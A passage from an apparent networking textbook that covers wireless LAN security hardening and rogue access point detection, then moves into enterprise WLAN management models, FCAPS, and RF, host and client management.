192.168.153.1.
Step Reduce DHCP scopeHome wireless access points usually act as Dynamic Host Configuration
6.
Protocol (DHCP) servers. This means they provide your desktop or laptop with an IP address when
requested. Most access points provide IP addresses from a "pool" of available numbers. This pool
can contain up to 253 IP addresses. Because you are likely to have only a handful of devices
requiring an IP adress, consider reducing the DHCP pool number. For example, if you have only a
single laptop you want to use on your home WLAN, you could reduce the DHCP pool to only one
or two addresses. This change will reduce the risk of unauthorized users from accessing your
WLAN.
Step Reduce transmit powerMost access points transmit at the maximum power possible when
7.
initially installed. This sometimes has the unwanted result of expanding the coverage of your
home wireless network outside or into neighboring areas. Reduce the transmit power to provide
only the coverage you require.
Step Use static IP addressesAssigning individual IP addresses to end devices and disabling DHCP will
8.
help control who has access as you limit the possibilities for unwanted people to access your
network.
Step Enable MAC address filtering (advanced and optional step)It is possible to configure most
9.
access points with a list of MAC addresses that are the only ones permitted to use the WLAN. With
this technique, you effectively "filter" the network and only allow the devices with the MAC
addresses you select. This technique helps prevent unwanted users from accessing your home
wireless network. Be sure to select the correct MAC address (the one of your WLAN NIC) if your
computer has more than one network interface.
Step Disable web access (advanced and optional step)You can disable web access on your access
10. point. By doing so, attackers cannot log on or configure your access point using a web browser.
Note that this means you also will be unable to log on to your access point and will have to use
the command-line interface thereafter. Therefore, this option is suitable only for advanced users.
Determine How to Support and Secure Mobile Devices

Mobile devices such as PDAs and "smart phones" present their own security challenges. A policy and
support plan for these devices is recommended for every corporation. If you choose to support these
devices on the wireless network, you should ensure that they, like the rest of your client devices, are
detailed in your security posture statement. Many issues will need to be addressed including, but not
limited to, the following:
What OS is supported (PalmOS, PocketPC, and so on)?
What wireless client software is required?
Can user IDs and passwords be cached on the device (a common but very risky attribute of these
devices)?
Determine How to Support and Secure Clients

One of the most difficult aspects of an effective and successful WLAN deployment is client management.
This ability to controlboth physically and logicallythe expectations and capabilities of client devices is
paramount. The threat of a client performing actions that mimic an AP is serious because this is
sometimes the cause of DoS attacks. To mitigate any possibility of the client device being the weak link
in the security of the WLAN, there also must be active control as to which clients are supported and what
their abilities are.
Manage Clients and Client Attributes

Beyond developing a policy and list of supported client devices, the policy needs to outline attributes of
the devices. Controlling these attributes helps to ensure that devices not supported in your security
policy are not permitted on the network, thereby strengthening your overall security posture.
You should consider the following three aspects of a client device:

Platform Define what platforms are supported. This not only includes the make and model but also
specific wireless adaptor cards that client devices may use.
OS Specify a list of supported operating systems and the particular revision level. This will not only
ensure a consistent and uniform security posturebut also make it easier for your operations staff to
isolate problems as several degrees of variability are removed.
Client software Define a single common wireless client software application. This can be as simple
as selecting the native client capabilities in the operating system (Windows XP Wireless Networking,
for example), the client software provided with mobile devices and laptop computers, or a standard
third-party client for use across all devices (such as that offered by Funk or Meetinghouse).
Anti-Virus
Although not specifically a wireless issue, user laptops and desktops should be provided with regularly
updated anti-virus software. WLANs, just like any network, can propagate viruses if the client devices
are not configured with appropriate software.
Soft AP
Some wireless software is available that allows a laptop or desktop computer to act as an access point.
This software-enabled access point or soft AP is considered a major threat because it is usually a trusted
device. The soft AP creates the same security threat as the unauthorized installation of rogue access
points. In some ways the soft AP can be a more dangerous threat because many hackers will use them
to stage attacks. As the successful hacker can turn any computer in an AP, he is not tied down anymore
by the physical placement of regular APs. In essence, the soft AP could enable a hacker to place an AP
wherever there is a computer. As such, we recommend that you disallow the use of this software
capability and make it very clear in your wireless security policy that such software is unacceptable.
Actively detecting soft APs is very difficult and this is another reason why radio-based rogue access point
detection is of critical importance.
Disable Ad-Hoc Mode Networking

Although this is primarily a policy decision, depending upon the wireless client software you use, it may
be possible to disable ad-hoc networking. Some client software allows you to disable certain functions
using centralized administration tools.
Detect Rogue APs

Rogue access points are access points that are located within your enterprise and that were not installed
by your IT department or approved vendors. They present a very serious security threat when
connected to your network as they are improperly configured with little or no security settings.
A robust rogue AP detection system is critical for any secure wireless network. Indeed, rogue AP
detection is critical because there is no such thing as a "non-wireless" network anymore; if you haven't
deployed a WLAN, you can only assume that there is no WLAN as staff are purchasing cheap access
points and installing them themselves, often without realizing the security implications.
It should be noted that the vast majority of rogue access points come from your own users, and only a
small minority are from malicious hackers. Most user-installed rogue APs are not intended to
compromise security but are attempts at benefiting from wireless networking without realizing the risks
of poorly configured devices. If you have a comprehensive entitlement policy and wide coverage area,
you will reduce the likelihood of rogue APs being installed in the first place.
Detecting rogue access points can be challenging. A combined approach of client-based reporting, radiobased detection, and network scanning is the best method.
Client-Based Reporting
Client-based reporting can be as simple as asking your users to report suspicious access points to the IT
department. These can be nonstandard (enterprise) AP models, APs in unusual locations such as hidden
under desks, and consumer-grade access points on desks or in cubicles. This reporting will allow your IT
team to investigate and address the threat if it turns out to be real.
Additionally, some solutions now available on the market allow for wireless clients, such as laptops, to
actively and automatically report a list of access points they have encountered to back-end management
system. This reporting is entirely transparent to the user, but it allows your wireless management
framework to construct a picture of all the access points in your enterprise. If an access point is reported
but is not listed or managed by your network management system, there is a chance that it is a rogue.
Radio-Based Detection
Radio-based detection uses your own access points, or dedicated scanners, to actively monitor the RF
spectrum and report all radio devices they detect. Effectively, your access points are "auditing the
airwaves" and drawing up a picture of the radio frequency use in your enterprise. Most of the leading
manufacturers provide radio-based rogue access point detection services with their products. These
often have the advantage of providing you with a graphical representation of what your radio network
looks like, using floor plans and colored cells or clouds to represent each 802.11 cell.
Radio-based detection can also be carried out manually by IT staff using handheld wireless network
analyzers or laptops with software designed specifically for this purpose. These include popular tools
such as AirMagnet, Kismet, and AirSnort.
Network-Based Detection
Network-based detection is the third essential pillar of a robust rogue access point detection system.
Network-based detection uses internally developed or publicly available tools to scan the wired network
for devices that match a particular signature or "fingerprint." These devices scan for familiar MAC
addresses, specific open TCP ports, and particular protocols and processes that might be running on a
device. These tools can even attempt to log on to the device and note its response. By combining
several criteria and automating the process into regular scripted jobs, network-based reporting can
quickly produce a list of suspicious devices. Your IT department can then use this list to investigate the
devices and act accordingly. One of the most popular publicly available pieces of software that can be
used for this purpose is WinFingerPrint (http://winfingerprint.sourceforge.net/).
Respond to Detected Rogue APs

After you have identified a rogue access point, you need to act. The potential responses can be
categorized under three headings: remove, reclassify, and remediate.
Remove
You can remove the rogue access point from the network. You can achieve this by disabling the network
switch port to which it is attached (if applicable), or you can confiscate the device or instruct the owner
to comply with your IT polices and power-off or remove the rogue access point. If the device is not
physically within the confines of your enterprise, you might need to "work around" the problem and
reconfigure some of your access points to remove the interference and contention.
Reclassify
You can reclassify many rogue access points, especially those identified during the initial discovery
phase, as friendly and therefore no longer a security risk. Friendly APs can be those that are internal to
your network, such as those in labs. Conversely, friendly APs can be external, such as those in shared
office spaces where another company manages and controls the APs. Keep the knowledge of the
function or ownership of these friendly APs for reference later when you audit rogues.
Remediate
Finally, you simply might want to remediate some rogue access points and ensure that they are
supported by your IT department and have the correct configuration. This choice can be due to a valid
requirement for WLAN coverage in a particular area, or it simply can be due to a bad configuration in an
access point that was officially supported.
Consider Using Intrusion Detection Systems

Many corporations opt for dedicated wireless intrusion detection systems (wireless IDSs). Many leading
wireless equipment manufacturers also provide this service with their solutions. Wireless IDSs are a
more advanced and dedicated approach to radio-based rogue access point detection. They often use
dedicated "scanners" (often access points themselves, but sometimes cheaper scan-only devices) and
specialized software. They can also be used to detect client behavior that you might want to prevent,
such as the creation of ad-hoc wireless networks and client-to-client file-sharing networks.
Wireless IDSs provide a very good level of security and are often used by corporations that want to
restrict or ban the use of wireless networks entirely. However, every large-scale enterprise-class
network can benefit from the added security they provide.
Summary
This chapter outlined the many threats to security that happen both intentionally and unintentionally.
These are vulnerabilities that you can avoid through proper planning and education. Today's threats
include the interception of encrypted data and denial of service attacks. This potential negative business
impact has created a great deal of emphasis on security practices, protocols, and the ability to protect
against malicious attacks. The risk, however, does not stop thereconsiderations in the policy and
methodology of WLAN security protection must also act as a defense against casual or incidental acts
that result from the unaware employee or user.
Today, WLAN security is built on identification of the client, authorization of the user, and encryption of
the data. Because wireless communication cannot be perfectly confined to an area, this three-tiered
security framework is essential for protecting the WLAN. 802.1x is the foundation framework for the
authentication process and is aided by EAP. Over time, many different standards have evolved with the
intent of protecting the WLAN. Currently, 802.11i has become the newest standard being specifically
developed for the WLAN to address security. WLAN security will continue to be one of the foremost
considerations when building a WLAN solution for the enterprise. This chapter covered the fundamental
information needed to develop a holistic and robust security plan for the WLAN.
The WLAN must be protected through preemptive actions. This begins with building standards based on
best practices for the configuration of the client and AP. Further efforts are put into securing the physical
space, monitoring for rogue APs, and taking charge of the airspace. Underpinning all these efforts is the
ability to provide client education and to ensure that the integrity of the network remains intact by
thwarting accidental events.
Finally, you should be able to place as much trust in the security of the WLAN as you would with the
traditional wired network. No solution is infallible, but with proper planning, education, and monitoring,
you can feel safe with whichever solution you deploy.
Chapter 8. Management Strategies for

Wireless LANs
Wireless networks are usually more challenging to manage than wired networks. The physical aspects of
a typical wired network are stable and predictable; the transport medium itself, "the wire," does not
change. Wireless networks, however, operate in a very dynamic environment. User experience can differ
from day to day, depending upon factors such as the number of concurrent users, interference,
multipath effects, and even time of day; for example, the radio frequency (RF) "landscape" of a WLAN
will be different at 6 a.m. than it will be at 3 p.m. during a typical working day. Furthermore, because of
the unlicensed nature of WLANs, there is always the risk that neighboring networks will spring up to
interfere with what was previously a stable environment. Finally, wireless technology is relatively new,
and many experienced networking professionals are still unfamiliar with the solutions, challenges, and
strategies for carefully managing this environment.
When you take the WLAN's unique physical properties into account, a WLAN can still be considered as
simply another transport mechanism. As such, many of the standard management strategies that are
tried and tested in the wired networking world are equally applicable to wireless networks; the common
themes of fault and configuration management, performance tuning, and operational support need only
be slightly modified to ensure that your WLAN is as stable, reliable, and secure as your wired network.
You must also consider the two general approaches to WLAN architecturesthe centralized model and the
distributed modeland the tools that are available to you. When considering the specifics of WLAN
management, you can view it as having three facets:
RF management
Host management
Client management
However, before delving into these topics, you must address a more fundamental question; that is, you
must determine what strategy your enterprise will adopt for wireless network management.
Solutions Lifecycle
Managing the WLAN can be considered part of two phases of the PPDIOO solutions lifecycle: operating
and optimizing. Unlike previous phases, operating and optimizing your WLAN can have a long duration
because they are ongoing even while you begin to plan, prepare, design, and implement the next
generation of your wireless network.
Management strategies for WLANs are the day-to-day manifestations of operations and optimization. As
a refresher, Figure 8-1 illustrates the PPDIOO solutions lifecycle.
Figure 8-1. PPDIOO Solutions Lifecycle
Management Strategies
How should the enterprise manage its WLAN? What tools should be used? What strategy should be
adopted? These are the challenging questions that you should answer before the wireless network is
being deployed.
No single product offers a complete solution. Some recommendations can be made safely, however, as
follows:
Use vendor-specific wireless management tools were possible.
Integrate wireless management into the existing network management framework.
Use fault management, configuration management, accounting management, performance
management, and security management (FCAPS) methodologies as a pointer to the standard areas
that your wireless management system should address.
Define a client management process. This is overlooked by FCAPS. (You learn more about FCAPS
later in this chapter in the "FCAPS" section.)
Develop in-house tools to plug any gaps not addressed by the vendor-specific wireless
management tools and to satisfy any unique reporting or management requirements that you
might have.
Another fundamental decision that you must make is whether to handle wireless network management
in-house or to outsource this activity to a trusted partner. Most enterprises will likely manage their own
networks, but outsourcing this activity is no longer uncommon.
In-House WLAN Management

Managing the WLAN in-house is perhaps the most common approach. Most enterprises will have their
own dedicated IT support staff. In these circumstances, it makes sense for your IT organization to treat
the wireless network no differently from the rest of your IT infrastructure. It is simply considered
another transport medium, similar to the wired network but with some unique characteristics.
Some enterprises choose to outsource the implementation and deployment of their WLAN but choose to
retain management responsibilities. This choice is common in sensitive industries or areas, such as
finance, government, or military organizations, but it is by no means limited to these. Providing native
access to your network is often considered a security and business risk. This reasoning is especially
understandable when you consider that WLAN management entails the ability to capture and analyze all
traffic, which is not something that every enterprise is comfortable with a third-party undertaking.
The disadvantages of retaining responsibility for WLAN management are also worth noting. Although
WLANs are just another network, the fact remains that they require wireless-specific skills. Your existing
IT support staff will need to familiarize themselves with this new technology and the unique
management and security challenges it presents. This familiarity can often be achieved through on-thejob training, but this training typically entails a steep learning curve, increased risk of poor management
performance. Staff in training can sometimes be a risk because they can be unaware of errors or can
cause security breaches, and so on. A more prudent approach is to engage in professional training that
is supplied either by the WLAN equipment vendor or by one of the many independent IT training
organizations.
When your IT staff are suitably trained or familiar with the WLAN technologies, you still must define,
develop, and adopt an appropriate WLAN management strategy. This process entails selecting the
appropriate tools, ensuring proper integration, and developing systems and procedures to automate as
much activity as possible. On-the-fly, reactive management is not a safe or prudent approach for an
enterprise-class wireless network.
Outsource WLAN Management

Outsourcing wireless network management is an attractive option for many enterprises that do not have
the resources and skills in-house. This option avoids the need to train your IT staff in wireless
technologies. Indeed, many enterprises outsource their network management entirely. In such a
situation, wireless network management is just another service that is provided by your trusted third
party. Both tangible and intangible, costs are involved in this approach, such as the monetary cost of
engaging the vendor and the administrative cost of managing their activity. In the end, the expense
might be lower than employing or training staff yourself. In the outsourced model, the responsibilities
that remain with you are to monitor the key performance indictors (KPIs) and Service Level Agreements
(SLAs) that you have set with the external vendor and to ensure user satisfaction. Careful economic
(strategic, tactical and financial) consideration is required to determine what is most beneficial for your
specific environment.
Before choosing the outsourcing option, you must be comfortable with the fact that your network traffic
will be visible to the third party, that access to your network infrastructure will be required, and that due
diligence is undertaken to ensure that security and business processes are not compromised.
Outsourcing removes some of the headaches of WLAN management from you and your enterprise, but it
should only be undertaken after a prudent risk and business case review.
FCAPS
FCAPS (fault, configuration, accounting, performance and security), the ISO model for network
management, is a functional approach that segments management areas into discrete categories, which
allows the network manager or management framework to address each in turn and ensure that no area
is overlooked. FCAPS is a model, not a product. Many network management applications and designs
adopt FCAPS, and internally developed procedures and tools can also be architected along these lines.
Even if your management product, framework, or application does not mention FCAPS, the five areas
covered by this model are probably addressed. If they are not, then there is value in identifying the gaps
in your management strategies. FCAPS is therefore useful to assist the network manager in ensuring
that a structured, methodological approach is taken to network management and that haphazard or
reactive management techniques and strategies are avoided.
FCAPS was born "in the wired world" of centrally managed environments. As mentioned earlier, wireless
networks present many unique challenges. Chief among these is the dynamic nature of the transport
medium. So although FCAPS is a useful tool, or indeed a useful mindset, with which to approach wireless
network management, you must ensure that it is either updated or enhanced to include the distinct
aspects of the wireless environment or only used as a tool to help guide your management strategies.
The next sections briefly examine the five functional areas of FCAPS and its shortcomings.
Fault Management
In this area, service-impacting events are identified and resolved. The network is monitored for
problems, and when identified, they are isolated and corrected. This functional area keeps the network
running. Downtime is minimized, and the network is kept operational. Fault management is perhaps the
most well-known area of network management.
Configuration Management
Within the configuration management functional area, the network is monitored, the status or design is
maintained, and any changes to network components are carefully planned, recorded, managed, and
performed. Subjects such as the IP addressing scheme, routing tables, wireless VLAN and Service Set
Identifier (SSID) assignment, and information on the physical devices and their logical layout are
handled in the configuration management area. Moves, adds, and changes are also dealt with here
because they affect the configuration of the network. Reporting on planned and past changes forms part
of this functional area.
Accounting Management
Accounting management is focused on the user and is the domain where data about network usage is
collected, collated, reported, and then acted upon. The gathering of statistics allows the network
manager to monitor usage, detect inefficiencies, bill users or groups for access (if applicable), and
produce trending reports to assist in proactive design and reconfiguration. Accounting management
allows you to monitor the actions of users, make better use of the available resources, and plan
accordingly for improvements. Reporting on historical use, called trend reporting, is an important facet
of this functional area.
Performance Management
Performance management is similar to accounting management in that you collect data from the
network, but you monitor the physical equipment and medium rather than users. In the performance
management functional area, you collect data on network resource utilization, set thresholds for
reporting and alerting, and make changes to fine-tune the network. Performance management can be as
simple as monitoring CPU or network interface utilization or as complex as full end-to-end application
monitoring. The concept is simple, however: Monitor the network, identify problems or chokepoints, and
fine-tune the environment.
Security Management
The security management functional area of FCAPS defines the process and procedures for network
security. The network is monitored for compliance to the security posture, risks are identified, events are
logged, and audit trails are created.
Where FCAPS Fails

FCAPS addresses management in the traditional environment, which typically means a wired network
with a clearly defined hierarchical architecture, static endpoints and deterministic behavior. Unlike
WLANs, relatively few external factors can affect a wired environment.
Wireless networks, on the other hand, are subject to many outside factors, and the endpoints (that is,
the wireless client devices) are mobile in nature. They can change their location, their IP address, and
even the status of their connectivity (online versus offline) on a regular basis in the dynamic radio
environment. The dynamic nature of clients' connectivity often does not represent a fault. Because of the
lack of any specific client management area in the FCAPS model and the fluid nondeterministic nature of
WLANs in general, FCAPS should not be considered a comprehensive system for wireless management.
Instead, FCAPS is useful in helping you focus on the traditional areas that require attention. It can be
considered a subset of a robust enterprise-class wireless network management framework. FCAPS is a
useful tool, but you should not use it as the sole method for conceptualizing and even designing your
management toolset.
Comparing Centralized and Distributed Management

Historically, WLANs have been approached in a manner similar to wired networks. Because the access
points were deemed access layer devices, or edge devices, they were considered no differently from a
typical Layer 2 switch. Both provided connectivity to the network, after all.
Most enterprise networks rely upon intelligent devices. This includes access layer switches and
(historically, once again) access points. Control and management were provided "at the edge," so the
devices required a degree of intelligencethat is, configurability and manageability. The access points
were considered "intelligent" or "autonomous" because they were effectively standalone devices. Each
access point stored all the features, settings, and configuration and acted as a unique, intelligent host on
the network. In other words, if you had a WLAN with 25 access points, you had to configure and manage
each of the 25 devices. The rest of the network infrastructure (the switches to which the APs were
connected) did not require wireless-specific awareness. This is the so-called distributed model, also
known as the autonomous AP architecture, and many products and manufacturers still use this
framework.
Recently the centralized model, commonly known as the thin AP or centralized AP architecture, has
gained popularity. This pardigm approaches WLAN intelligence differently. Instead of embedding the
intelligence into the access points themselves, it is centralized into the device to which the AP is
physically or logically attached. The attachment points are typically dedicated appliances (so-called
"wireless LAN controllers") that act as a centralized management system for the access points. The APs
are configured and managed not individually but centrally from these controllers. Conversely, this model
requires dedicated wireless controllers (or wireless switches).
Often, the WLAN controller automatically configures the access point settings entirely, obviating the
need for IT staff to configure each device with specific or distinct radio settings, for example. On the
other hand, this system sometimes results in reduced configurability, removing your IT staff's ability to
fine-tune or mold the wireless network to your particular needs. In these circumstances, you can disable
the automatic "self configuring" features while retaining the other benefits of the centralized model.
Both the centralized and distributed models have their advantages and disadvantages. The traditional,
distributed architecture provides a robust system that does not rely upon dedicated wireless appliances.
Access points can be installed anywhere on the WLAN, and each site (small offices, remote branches,
individual buildings) does not require additional equipment in the form of a dedicated controller. The
access points contain all the configuration and settings required and use common operating systems,
such as those already familiar to your IT support staff. A distributed model is very scalable because new
APs can be installed wherever you have a free Ethernet port.
The centralized "wireless switch" or "wireless controller" architecture simplifies deployment. Almost all
the wireless settings are configured centrally, and there is no (or reduced) need to configure each access
point. Many products that adopt this approach also include added features, such as VPN tunnel
termination, guest networking capabilities, and wireless intrusion detection systems. The wireless
management is provided by either the controller or, more often, another separate WLAN management
appliance. The centralized model can often make small or medium installations very easy to deploy. On
the other hand, the centralized model does not scale as well because it requires dedicated controllers for
each WLAN site and may even require several controllers for larger buildings or deployments. This can
rapidly become costly and a deployment challenge in its own right.
The manufacturer of the product that you select will most likely dictate whether you use a centralized or
distributed architecture. Some manufacturers, such as Cisco Systems, offer both. In either case, some
fundamental WLAN management strategies are necessary for both models, and neither obviates the
need for a carefully considered and robust management framework. Despite what any marketing or
sales people tell you, there will always be a need for a holistic approach that takes into account more
than just the simple "intelligence" or configurability of the access point.
WLAN Management
This section describes the particulars of wireless network management. You learn about the unique,
particular areas that you must address in your enterprise WLAN management strategy. As mentioned
previously, wireless networks are in some ways just another transport medium and can be considered in
the same way as traditional wired networks, but in other ways, they present their own challenges and
exhibit their own unique characteristics. This directly influences the manner in which you must manage
your WLANs.
RF Management
Management of the RF spectrum is the most obvious characteristic that is unique to the wireless
environment. Radio communications can present serious problems for a poorly designed network. As
such, the management of the RF spectrum is traditionally considered the most difficult and timeconsumingaspect of building a WLAN. RF management typically refers to the following. You should
ensure that your management toolset addresses each of the following dimensions of RF management:
Channel allocation Your management toolset should be capable of assigning relevant channels;
these are dependent upon which IEEE standard you are using on a particular access point.
Transmit power Manage the transmit power of your access points. In many circumstances, you
will need to change the transmit power to address interference, extend access in poorly covered
rooms, or reduce prevent power due to radio coverage from extending beyond the physical
boundary of your buildings. Several WLAN management solutions offer proactive, dynamic, or
automatic tuning of transmit power. When used by several access points in conjunction, this setup
is often referred to as self-healing WLANs. The wireless network can detect areas of poor coverage
or a failed access point and automatically increase power to correct error.
Interference detection Nearby WLANs installed by others, poorly shielded microwave ovens,
older analog wireless phones, and even baby monitors can create interference. Anything that
transmits in the 2.4-GHz or 5-GHz frequency range is a potential interfering device. You should be
able to detect interference and, ideally, locate it. You can achieve detection and location by using
native WLAN management features that some products offer or you can use standalone wireless
sniffers. These are usually handheld devices that IT engineers use to scan and analyze network
traffic. Your management strategy should take this into account regardless of the specific tool you
choose.
Note
Sniffing is passive interception of network traffic, usually with a view to analyzing it later
to gain access to information stored in the captured data. Sniffing is possible on both
wired and wireless networks, but it is much easier in the latter because the sniffing device
does not need to be physically connected to the network. In the wireless environment,
you only need a wireless card to capture traffic transmitted by nearby access points or
other client devices. Sniffing can be undertaken with dedicated devices designed explicitly
for that purpose or, more commonly, by regular laptops or PDAs with special software.
Sniffing is deemed to be "passive" because the sniffing device does not need to send
traffic or advertise its presence; it simply "listens" to the network and stores any traffic it
can.
IT professionals often use sniffing when they are troubleshooting network problems
because the capture and analysis of traffic allows careful and detailed examination into
every packet. However, many hackers also use sniffing in an attempt to gain access to a
network. Traffic is captured, and the hacker attempts to read the data. Robust
encryption, like that offered by WPA, is essential for enterprise-class WLANs. Although it
is very difficult to prevent sniffing, strongly encrypted traffic is impossible to decipher and
is therefore protected.
A simple but useful analogy is to think of sniffing as "eavesdropping." In normal
circumstances, it is impossible to stop someone from listening to your conversation. But if
you are talking in code, it does not matter as much.
Rogue AP detection Rogue AP detection is a critical aspect of any WLAN management framework.
Often considered a security issue, rogue AP detection is usually (but not exclusively) achieved
through RF detection capabilities. This is provided by either the native WLAN management featureset inherent in the product you select or, once again, provided by standalone or handheld wireless
sniffer devices. It should be noted that RF-based rogue AP detection should not be considered the
only method of identifying rogue APs, but rather one part of a multifaceted strategy. This is
discussed in more detail in Chapter 7, "Security and Wireless LANs."
Location-based services (LBS) This term describes the features that allow a WLAN to track the
location and movement of wireless devices. These can be WLAN network adaptors in laptops, PDAs,
or wireless phones, or dedicated radio transmitters (often known as "asset tags") that are fixed to
equipment specifically to enable asset tracking. For example, in many hospitals, LBS is used to
track expensive diagnostic or medical equipment; in some manufacturing plants, LBS is used to
track the movement of forklift trucks or equipment as it moves around the factory floor. This
capability is also known as Radio Frequency Identification (RFID). Note that RFID is a generic term
and quite often refers to cheaper, non-WLAN-based technologies used in the retail market. RFID is
a form of LBS.
Wireless Intrusion Detection Systems (WIDS) WIDS are tools that allow you to identify
aberrant radio activity within your WLAN. They are a wireless-based version of the Intrusion
Detection System (IDS) used in wired networks to detect suspicious or security compromising
activity. WIDS provide ongoing, continuous monitoring of the RF range, detecting threats, attacks,
and interference that spot checks or snapshots can overlook. WIDS can be implemented by
dedicated sensors, standalone handheld devices (which tend to be less useful because of their
intermittent use by IT staff), or by the native WLAN infrastructure itself; the access points
themselves can scan the airwaves while providing network connectivity to your users. WIDS can
detect rogue access points, denial of service (DoS) attacks, and insecure ad-hoc networks (peer-topeer WLANs that users configure with their own clients) that compromise security.
Visualization Because WLANs are very dynamic and nondeterministic in nature (radio cells can
change over time based upon transmission or a changing physical environment), IT staff can never
be certain of the coverage at a particular moment. To help combat this challenge, many WLAN
equipment manufacturers developed the concept of visualization. These reporting and monitoring
tools provide a map of your floor plan along with visual cues as to the size and location of radio
cells. The maps are called heat maps because they are similar to the colored maps used to show
varying levels of heat in oceanography or geographical sciences. Color is used to show the various
levels of signal strength.
Visualization is extremely useful for the IT organization. At one glance, your IT support staff can
see the current state of coverage (without having to walk around measuring it), the signal strength,
and any gaps or "holes" in the WLAN. Because floor plans and heat maps are very intuitive, this
system greatly enhances the speed and ease with which your support organization can
troubleshoot problems. Figure 8-2 is an example of a visualization tool. The different shades in the
"heat map" reflect differing signal strengths.
Figure 8-2. Example Visualization Tool Using Heat Maps

Note
Many of the preceding RF management issues are addressed or managed in a centralized
manner by the wireless switch products or the dedicated WLAN management appliances
offered by most enterprise-class solutions. In many cases, you will configure these
settings once on the WLAN controller or even allow the WLAN controller to configure
these options automatically for you. Alternatively, you might create templates and
automate the configuration of the APs, leaving the management appliance to

automatically configure the access points. This option reduces management costs but
takes control away from your IT staff. In small to medium deployments, and even in
some large environments, the operational cost savings can be significant.
Host Management
All IT and network support staff should be familiar with host management. In many ways, this is the
easiest area of WLAN management. Depending upon the architecture of your WLAN (centralized versus
distributed), you might need to manage every individual access point, or you might be able to use a
centralized management toolset.
Most enterprise-class WLAN equipment now offers dedicated WLAN management appliances. This is true
for not only the centralized models but also the distributed intelligent AP models. The Cisco Wireless
Control System (WCS) is an example of a dedicated WLAN management appliance.
With host management, you must consider issues such as the following:
Access point configuration
- IP address
- Host name
- SSID(s)
- VLAN(s)
Security settings
- EAP mechanism
- Encryption protocol
- AAA settings
RF settings
- Transmission power
- Frequency band (802.11a, 802.11b, 802.11g)
- Channel allocation
Managing the equipment
- Firmware management
- Image (or operating system) management
Client Management
Client management is one of the hidden challenges in supporting a wireless network. Unlike the wired
environment, where hosts are usually static and their interoperability and connectivity to the network are
well understood, WLANs tend to have a wide variety of clients that require ongoing monitoring,
management, and support. For example, as WLAN security standards evolve, the various client adaptors
often need software and firmware updates to keep abreast of these new developments. Wireless devices
also usually need specific WLAN client software. This is especially true if you require functionality to that
provided by modern operating systems such as Windows XP or MacOS.
In a typical WLAN environment, you have to support several operating systems, different makes and
models of laptop (each with different wireless adaptors), and many wireless devices (such as mobile barcode readers, wireless VoIP handsets, or embedded wireless intelligent systems in manufacturing or
factory equipment). The combination of these different endpoints, from different manufacturers and
each running different software, makes ensuring a stable, consistent, and secure environment a
chakkenging task.
Your wireless management strategy cannot afford to ignore these unique requirements. WLAN client
management is often overlooked when large-scale enterprise deployments are undertaken, resulting in a
haphazard, costly, and reactive approach that doesn't effectively support those hundreds or thousands
of devices.
Many wireless client software come with their own management application. The application centrally
defines and distributes profiles, updates client security postures, and even polls devices for reporting
information. However, in the typical heterogeneous environment, using a single standard hardware
adaptor and software client is not possible. In these circumstances, you have two choices: You can
accept the inevitable burden of supporting and managing disparate wireless platforms, or you can adopt
a third-party cross-platform wireless software client.
Companies such as Meetinghouse Data Communications (http://www.mtghouse.com) provide wireless
client software that is supported on a variety of operating systems and on the most common wireless
adaptors. Additionally, they provide comprehensive client management features, including centralized
profile management and client configuration, which is discussed in more detail later. Many companies
have adopted these cross-platform clients because of these features.
Another nonexclusive option is the use of client management tools that your enterprise might have
already deployed to help support existing computer systems. Tools such as Microsoft SMS and Altiris
Client and Mobile Manager allow you to distribute software and applications to your end-user devices.
These tools can help manage your clients, but they might not address the wireless-specific requirements
such as profile creation and updating.
Finally, the need to flash adaptor firmware is an uncommon occurrence. However, it is sometimes
required, and you should therefore plan for it accordingly. Flashing the firmware updates the
"embedded" software on the adaptors. This is sometimes necessary when the manufacturer distributes
bug fixes or new features. Ensuring that your cards have the latest firmware before or during the
installation is highly recommended (see Chapter 6, "Wireless LAN Deployment Considerations").
Challenges Unique to WLAN Management

WLANs present several unique management challenges. Many relate to the physical aspects of the
wireless environment, whereas some are the result of the dynamic nature of the wireless network and its
mobile users and devices. Knowledge of these challenges will help ensure that you do not overlook these
areas in framing your management strategy for the enterprise-class WLAN. Some of the most commonly
experienced problems and challenges you will face include the following:
The dynamic nature of the transparent medium
The mobility of endpoints
The persistence of endpoints
The nature of mobile endpoints
Wireless security management
These challenges are fundamental in nature and simply characteristic of the wireless environment. None
is insurmountable, and examining each in turn can assist in addressing them in your management
strategy.
Dynamic Nature of the Transport Medium

Wired networks are deterministic in nature. That is, they function on a predictable basis with very little
outside influence on their operation. Wireless LANs, on the other hand, can be considered statistical or
probabilistic in nature. As mentioned in the introduction to this chapter, the wireless LAN will function
differently depending upon the number of users associated to a particular access point, the amount of
traffic generated by those users and devices, and outside interference, either from nearby but external
networks or from factors such as the physical environment.
Most enterprise-class WLANs are made up of several access points providing large areas of coverage in
one or more buildings. However, the dynamic nature of the transport medium, the RF spectrum upon
which 802.11 WLANs are based, means that one cell will by its very nature have different characteristics
from another cell. This can even be the case in the same building. The cell's size and shape are
dependent not only on the transmission power of the access point but also on such effects as the
composition of walls and floors, the location of physical obstacles such as furniture, the existence of
other nearby devices using similar radio frequencies, and so on.
A carefully designed WLAN is capable of withstanding the vast majority of these effects. However, the
fact remains that a wireless LAN's behavior is isolated in both time and space. Appreciation of this fact
prepares the network manager to face these challenges and to ensure that the tools he or she puts in
place can help identify unique radio-based problems, often before they negatively impact the end users.
Mobility of Endpoints
WLANs enable and promote mobility. Thus, at any point in time, a mobile device could be at any location
on the network. Mobile devices, such as laptops, PDAs, or even wireless-equipped vehicles or
manufacturing equipment, can roam from access point to access point. In a wired environment, the
network manager (or network management toolset) knows and can predict where a particular endpoint
is. In the vast majority of cases, endpoints are literally "wired" to a jack and, in turn, a switched port on
your networking infrastructure. That is not so in the wireless LAN. Devices move about the building,
campus, or factory floor. Without specific tools or reports, it is often difficult, or even impossible, to
identify a wireless device's location. Indeed, they will often change IP addresses on a daily basis,
sometimes more often. Layer 3 (inter-subnet) roaming results in the client being assigned a new IP
address.
Intermittent Connectivity of Mobile Endpoints

Most wired networks are a collection of physically static devices that present a degree of "persistence" in
their connectivity. That is, they usually remain online and connected for long periods of time, if not
indefinitely.
In the wireless space, especially with the introduction of PDAs, Application-Specific Devices (ASD) such
as bar-code scanners, wireless voice handsets, and smart phones, wireless-enabled devices come online
and go offline on an irregular, unpredictable basis. Of course, that is not to say that all mobile devices
are going offline all the time, but rather the nature of many mobile devices (such as PDAs) is such that a
system cannot automatically assume they are online at a particular time.
Management tools and strategies that rely upon persistence of connectivitythe ability to reliably contact,
ping, identify, or locate end deviceswill not handle such an environment well. A toolset that automatically
